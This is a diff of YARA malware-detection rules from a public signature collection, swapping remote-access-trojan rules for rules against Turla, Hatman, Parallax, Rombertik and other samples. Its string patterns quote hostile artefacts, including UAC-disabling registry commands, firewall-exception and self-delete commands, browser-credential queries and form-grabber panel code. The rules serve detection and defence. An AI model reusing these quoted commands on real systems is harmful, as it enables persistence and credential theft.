 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/SpyGate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L863-L890"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L129-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b891212f3a669c6066cfddef418faafd75c92bb2f1e8e1f48403422a73bc9fa"
-		score = 75
-		quality = 83
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		logic_hash = "fbaca774d6398aac7c171a5d87aa456a1921c1b80449d06f392b088db33ee845"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
+		hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
+		hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
 
 	strings:
-		$split = "abccba"
-		$a1 = "abccbaSpyGateRATabccba"
-		$a2 = "StubX.pdb"
-		$a3 = "abccbaDanabccb"
-		$b1 = "monikerString" nocase
-		$b2 = "virustotal1"
-		$b3 = "get_CurrentDomain"
-		$c1 = "shutdowncomputer" wide
-		$c2 = "shutdown -r -t 00" wide
-		$c3 = "set cdaudio door closed" wide
-		$c4 = "FileManagerSplit" wide
-		$c5 = "Chating With >> [~Hacker~]" wide
+		$s1 = "Logger32.dll" ascii fullword
+		$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
+		$s5 = "Unsupported drive!!!" ascii fullword
+		$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword
+		$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
+		$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
+		$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
 
 	condition:
-		( all of ( $a* ) and #split > 40 ) or ( all of ( $b* ) and #split > 10 ) or ( all of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "073235ae6dfbb1bf5db68a039a7b7726" or all of them )
 }
-rule SIGNATURE_BASE_RAT_Sub7Nation
+rule SIGNATURE_BASE_Hatman_Compiled_Python : HATMAN
 {
 	meta:
-		description = "Detects Sub7Nation RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
-		id = "4f41d649-4a90-566b-bda8-0a288380aeaa"
-		date = "2014-01-04"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "fd156669-72b4-59a5-8f36-aac21d7b3105"
+		date = "2017-12-19"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Sub7Nation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L892-L913"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L86-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd6c423cd5cb5a86b20e5e65ab460904548b8814c92ac65e497757bb79a27681"
+		logic_hash = "a18018e4c6ea5b7ab6e1dbdc050e565f66520676565db6d352f58a786097960f"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$a = "EnableLUA /t REG_DWORD /d 0 /f"
-		$i = "HostSettings"
-		$verSpecific1 = "sevane.tmp"
-		$verSpecific2 = "cmd_.bat"
-		$verSpecific3 = "a2b7c3d7e4"
-		$verSpecific4 = "cmd.dll"
+		tags = "HATMAN"
 
 	condition:
-		all of them
+		SIGNATURE_BASE_Hatman_Nullsub_PRIVATE and SIGNATURE_BASE_Hatman_Setstatus_PRIVATE and SIGNATURE_BASE_Hatman_Dividers_PRIVATE
 }
-rule SIGNATURE_BASE_RAT_Vertex
+rule SIGNATURE_BASE_Hatman_Injector : HATMAN
 {
 	meta:
-		description = "Detects Vertex RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f6f5967e-6b88-5d95-8fe1-a286ee8ce64c"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Vertex"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L915-L938"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "b939b83d-cc4a-5998-89a7-8abf8d0b8592"
+		date = "2017-12-19"
+		modified = "2023-01-09"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L96-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c9fb0dedd97240ad29924865118ba34f5d79dbefbb13729d96d41336ec4de39e"
+		logic_hash = "19edf44bec6e1cbccefa145c5ae1bf0820729a80ac3ef1c8e7100b465b487e3c"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$string1 = "DEFPATH"
-		$string2 = "HKNAME"
-		$string3 = "HPORT"
-		$string4 = "INSTALL"
-		$string5 = "IPATH"
-		$string6 = "MUTEX"
-		$res1 = "PANELPATH"
-		$res2 = "ROOTURL"
+		tags = "HATMAN"
 
 	condition:
-		all of them
+		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
 }
-rule SIGNATURE_BASE_RAT_Virusrat
+rule SIGNATURE_BASE_Hatman_Payload : HATMAN
 {
 	meta:
-		description = "Detects VirusRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "ef00cec9-d09b-5010-8e7d-bb391c937f34"
-		date = "2014-01-04"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "9ef57fca-a536-5937-8510-b410f735a73e"
+		date = "2017-12-19"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/VirusRat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L940-L967"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hatman.yar#L107-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8540296fe1341a793377494cec9ba6ee0313203bee9997f0da0b692959727c59"
+		logic_hash = "9a6e5d2c2f2be35e6dc8b418e33419977460006923ecd9f029cacf51d8c0477a"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$string0 = "virustotal"
-		$string1 = "virusscan"
-		$string2 = "abccba"
-		$string3 = "pronoip"
-		$string4 = "streamWebcam"
-		$string5 = "DOMAIN_PASSWORD"
-		$string6 = "Stub.Form1.resources"
-		$string7 = "ftp://{0}@{1}" wide
-		$string8 = "SELECT * FROM moz_logins" wide
-		$string9 = "SELECT * FROM moz_disabledHosts" wide
-		$string10 = "DynDNS\\Updater\\config.dyndns" wide
-		$string11 = "|BawaneH|" wide
+		tags = "HATMAN"
 
 	condition:
-		all of them
+		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origcode_PRIVATE and SIGNATURE_BASE_Hatman_Mftmsr_PRIVATE ) and not ( SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
 }
-rule SIGNATURE_BASE_RAT_Xtreme
+rule SIGNATURE_BASE_MAL_Crime_Win32_Rat_Parallax_Shell_Bin : FILE
 {
 	meta:
-		description = "Detects Xtreme RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "02b7bb6a-5d1e-5379-b366-868680844719"
-		date = "2014-01-04"
+		description = "Detects Parallax injected code"
+		author = "@VK_Intel"
+		id = "6bb337ef-3156-589a-9b2f-fa1b21699433"
+		date = "2020-05-05"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Xtreme"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L969-L990"
+		reference = "https://twitter.com/VK_Intel/status/1257714191902937088"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rat_parallax.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4dec8de6609f8229444291a78e920ac48b9b5751dd0cad7c95bc6529d6f8c16c"
+		logic_hash = "6b8c71cc19ca6f066d27a4e58d9ec347ac51d245308f2c41adf2386242581610"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-		ver = "2.9, 3.1, 3.2, 3.5"
+		tags = "FILE"
+		tlp = "white"
 
 	strings:
-		$a = "XTREME" wide
-		$b = "ServerStarted" wide
-		$c = "XtremeKeylogger" wide
-		$d = "x.html" wide
-		$e = "Xtreme RAT" wide
+		$ntdll_load = {55 8b ec 81 ec d0 08 00 00 53 56 57 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 33 c0 b9 18 01 00 00 f3 ?? 68 02 9f e6 6a e8 ?? ?? ?? ?? 8b d8 68 40 5e c0 84 89 ?? ?? e8 ?? ?? ?? ?? 6a 00 8b f0 68 0b 1c 64 72 53 89 ?? ?? e8 ?? ?? ?? ?? 83 c4 14 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 68 30 02 00 00 51 ff d0 6a 6e 58 6a 74 66 ?? ?? ?? ?? ?? ?? 58 6a 64 59 6a 6c 66 ?? ?? ?? ?? ?? ?? 58 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 33 c0 6a 2e}
+		$call_func = {81 ec bc 00 00 00 8d ?? ?? 56 50 6a 00 6a 01 ff ?? ?? e8 ?? ?? ?? ?? 8b f0 83 c4 10 85 f6 0f ?? ?? ?? ?? ?? 33 c9 89 ?? ?? 39 ?? ?? 0f ?? ?? ?? ?? ?? 8b ?? ?? 53 57 8b ?? ?? 8d ?? ?? 0f ?? ?? ?? 8b ?? ?? 8d ?? ?? 8b ?? ?? 03 fa 8b df 2b da 03 ?? ?? 80 ?? ?? 0f ?? ?? ?? ?? ?? 83 ?? ?? ?? 8b c7 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 99 89 ?? ?? 8b ca 89 ?? ?? 8d ?? ?? 99 89 ?? ?? 89 ?? ?? 8d ?? ?? 89 ?? ?? 89 ?? ?? 8b ca 99 89 ?? ?? 89 ?? ?? 8b ca 89 ?? ?? 89 ?? ?? 8d ?? ?? 6a 40 89 ?? ??}
+		$cryp_hex = {8b ec 8b ?? ?? 25 55 55 55 55 d1 e0 8b ?? ?? d1 e9 81 e1 55 55 55 55 0b c1 89 ?? ?? 8b ?? ?? 81 e2 33 33 33 33 c1 e2 02 8b ?? ?? c1 e8 02 25 33 33 33 33 0b d0 89 ?? ?? 8b ?? ?? 81 e1 0f 0f 0f 0f c1 e1 04 8b ?? ?? c1 ea 04 81 e2 0f 0f 0f 0f 0b ca 89 ?? ?? 8b ?? ?? c1 e0 18 8b ?? ?? 81 e1 00 ff 00 00 c1 e1 08 0b c1 8b ?? ?? c1 ea 08 81 e2 00 ff 00 00 0b c2 8b ?? ?? c1 e9 18 0b c1 89 ?? ?? 8b ?? ?? 5d c3}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 2 of them or all of them
 }
-rule SIGNATURE_BASE_RAT_Adwind
+rule SIGNATURE_BASE_Rombertik_Carbongrabber : FILE
 {
 	meta:
-		description = "Detects Adwind RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "95681c07-0e9c-5688-a8a0-899617521c7b"
-		date = "2014-01-04"
+		description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/adWind"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L992-L1011"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "11167b927fa06324950753c6ec8f28058f2aa66fb4ecdf66a21de11a8db190b8"
+		logic_hash = "ddc3ebcc460909a4afc9994cae53c9b7642f92ab6f16e2653f6b2d5002a33cda"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
+		hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
+		hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
+		hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "config.xml"
-		$a = "Adwind.class"
-		$b = "Principal.adwind"
+		$x1 = "ZwGetWriteWatch" fullword ascii
+		$x2 = "OutputDebugStringA" fullword ascii
+		$x3 = "malwar" fullword ascii
+		$x4 = "sampl" fullword ascii
+		$x5 = "viru" fullword ascii
+		$x6 = "sandb" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_RAT_Njrat
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel_Installscript : FILE
 {
 	meta:
-		description = "Detects njRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "6289b9c8-eef6-5cfb-97bd-b819158d6fdd"
-		date = "2014-01-04"
+		description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/njRat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1013-L1036"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L33-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47e8cc71caaefd70a170eb8fc845cb7ddb8df04b90163fe35f1ccb9a3f614c57"
+		hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"
+		logic_hash = "a0edc53aea21bc317f510a4a463ca677d9dc1ec234ca9824bc46711c851f2ccc"
 		score = 75
-		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = {7C 00 27 00 7C 00 27 00 7C}
-		$s2 = "netsh firewall add allowedprogram" wide
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s4 = "yyyy-MM-dd" wide
-		$v1 = "cmd.exe /k ping 0 & del" wide
-		$v2 = "cmd.exe /c ping 127.0.0.1 & del" wide
-		$v3 = "cmd.exe /c ping 0 -n 2 & del" wide
+		$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii
+		$s3 = "`post` text NOT NULL," fullword ascii
+		$s4 = "`host` text NOT NULL," fullword ascii
+		$s5 = ") ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
+		$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
+		$s9 = "$db->exec($insert);" fullword ascii
+		$s10 = "`browser` text NOT NULL," fullword ascii
+		$s13 = "`ip` text NOT NULL," fullword ascii
 
 	condition:
-		all of ( $s* ) and any of ( $v* )
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Unrecom
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel : FILE
 {
 	meta:
-		description = "Detects unrecom RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "56b11c22-f43c-5192-9a0a-0ac14b0cd041"
-		date = "2014-01-04"
+		description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/unrecom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1038-L1058"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L55-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "15ab9ee2f3fd825e91813a185bc5c7d7e790de39cd3e88c375b801d1412a08f4"
+		hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"
+		logic_hash = "8b7fde3c3894b7aa83e05f6a1b820195276f8738fde218485c0465afaed88427"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$meta = "META-INF"
-		$conf = "load/ID"
-		$a = "load/JarMain.class"
-		$b = "load/MANIFEST.MF"
-		$c = "plugins/UnrecomServer.class"
+		$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
+		$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii
+		$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
+		$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii
+		$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
+		$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
 
 	condition:
-		all of them
+		filesize < 46KB and all of them
 }
-rule SIGNATURE_BASE_MAL_JRAT_Oct18_1 : FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder : FILE
 {
 	meta:
-		description = "Detects JRAT malware"
+		description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f211ef1c-8def-55f0-8817-d01ebd9c2947"
-		date = "2018-10-11"
+		id = "3233c139-ac06-576c-9870-51306d5aa385"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1060-L1072"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L75-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7c652f3943ae7639633b82663f639adb7dea1bae9e617a14710fb6e448cfdbee"
+		hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"
+		logic_hash = "e9d13913ee03926920eba33a4dac2a6e9aeaaa54949c5bfea8dd956cf233abae"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/JRat.class" ascii
+		$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii
+		$s1 = "Host(www.panel.com): " fullword ascii
+		$s2 = "Path(/form/index.php?a=insert): " fullword ascii
+		$s3 = "FileName: " fullword ascii
+		$s4 = "~Rich8" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 35KB and all of them
 }
-rule SIGNATURE_BASE_Getuserspns_VBS
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder_Server : FILE
 {
 	meta:
-		description = "Auto-generated rule - file GetUserSPNs.vbs"
+		description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5576c1b9-4670-52c5-b23c-64adcc8709de"
-		date = "2016-05-21"
+		id = "742003a2-3716-5ad9-a720-b9e2be71554a"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L8-L23"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L94-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ece81cd717fed6ca1f9053384911fd59462b6f3b01210ceeb037ba3da2f7a318"
+		hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"
+		logic_hash = "693c92128166c72aded066fa66eef906a9f6027c65b889f3a487a38382f29982"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8dcb568d475fd8a0557e70ca88a262b7c06d0f42835c855b52e059c0f5ce9237"
 
 	strings:
-		$s1 = "Wscript.Echo \"User Logon: \" & oRecordset.Fields(\"samAccountName\")" fullword ascii
-		$s2 = "Wscript.Echo \" USAGE:        \" & WScript.ScriptName & \" SpnToFind [GC Servername or Forestname]\"" fullword ascii
-		$s3 = "strADOQuery = \"<\" + strGCPath + \">;(&(!objectClass=computer)(servicePrincipalName=*));\" & _" fullword ascii
+		$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
+		$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
+		$s4 = "chrome.exe" fullword ascii
+		$s5 = "firefox.exe" fullword ascii
+		$s6 = "chrome.dll" fullword ascii
+		$s7 = "@KERNEL32.DLL" fullword wide
+		$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
+		$s10 = "&post=" fullword ascii
+		$s11 = "&host=" fullword ascii
+		$s12 = "Ws2_32.dll" fullword ascii
+		$s16 = "&browser=" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 8 of them
 }
-rule SIGNATURE_BASE_Getuserspns_PS1
+rule SIGNATURE_BASE_KR_Target_Malware_Aug17 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file GetUserSPNs.ps1"
+		description = "Detects malware that targeted South Korea in Aug 2017 - file MRDqsbuEqGxrgqtbXU.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2fba75c-264f-5e89-afaf-9d19a4a90784"
-		date = "2016-05-21"
+		id = "2a6a7921-953a-502c-9702-b27325b2c3b8"
+		date = "2017-08-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L25-L41"
+		reference = "https://twitter.com/eyalsela/status/900250203097354240"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kr_malware.yar#L11-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "204b009677a02bf8725f928c2bfff321b4543a883760e312a0c92f187684c8e9"
+		logic_hash = "47c3350b489b023687f05f55a09f0092456c87b4beeda563756a99ccd5091b09"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b69206b8d93ac86fe364178011723f4b1544fff7eb1ea544ab8912c436ddc04"
+		hash1 = "82cada01643a42c8cd9600b8c33f3760d15e5eb6fabec2d531cf13cece095c78"
 
 	strings:
-		$s1 = "$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()" fullword ascii
-		$s2 = "@{Name=\"PasswordLastSet\";      Expression={[datetime]::fromFileTime($result.Properties[\"pwdlastset\"][0])} } #, `" fullword ascii
-		$s3 = "Write-Host \"No Global Catalogs Found!\"" fullword ascii
-		$s4 = "$searcher.PropertiesToLoad.Add(\"pwdlastset\") | Out-Null" fullword ascii
+		$x1 = { 53 00 75 00 63 00 63 00 65 00 00 2F 53 00 6F 00
+               6D 00 65 00 74 00 68 00 69 00 6E 00 67 00 20 00
+               77 00 65 00 6E 00 74 00 20 00 77 00 72 00 6F 00
+               6E 00 67 00 }
+		$x2 = "lnVMODvjSfOQQnfiuFogghlL" fullword ascii
+		$x3 = "E X I T  +R U N A S  /a P P d A T A " fullword ascii
+		$x4 = "uSEsHELLeXECUTE gETeNTRYaSSEMBLY GET" fullword ascii
+		$x5 = "ZahUKBXz" fullword wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them )
 }
-rule SIGNATURE_BASE_Kerberoast_PY
+rule SIGNATURE_BASE_Wildneutron_Sample_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file kerberoast.py"
+		description = "Wild Neutron APT Sample Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cea6cdb2-cd1a-5701-a9d1-27c788a962a7"
-		date = "2016-05-21"
+		id = "7bcb407f-7f01-540a-852c-a37456270888"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/skelsec/PyKerberoast"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L43-L59"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b285cc55733bd4c499ffb4821a92675806bf66faf3b3565ffb6de867bed538d"
-		score = 75
+		hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
+		logic_hash = "d8044761fa51f2afd16eb096aa9e896483387c47e10ce922f2ef32ebcbd1a520"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73155949b4344db2ae511ec8cab85da1ccbf2dfec3607fb9acdc281357cdf380"
 
 	strings:
-		$s1 = "newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)" fullword ascii
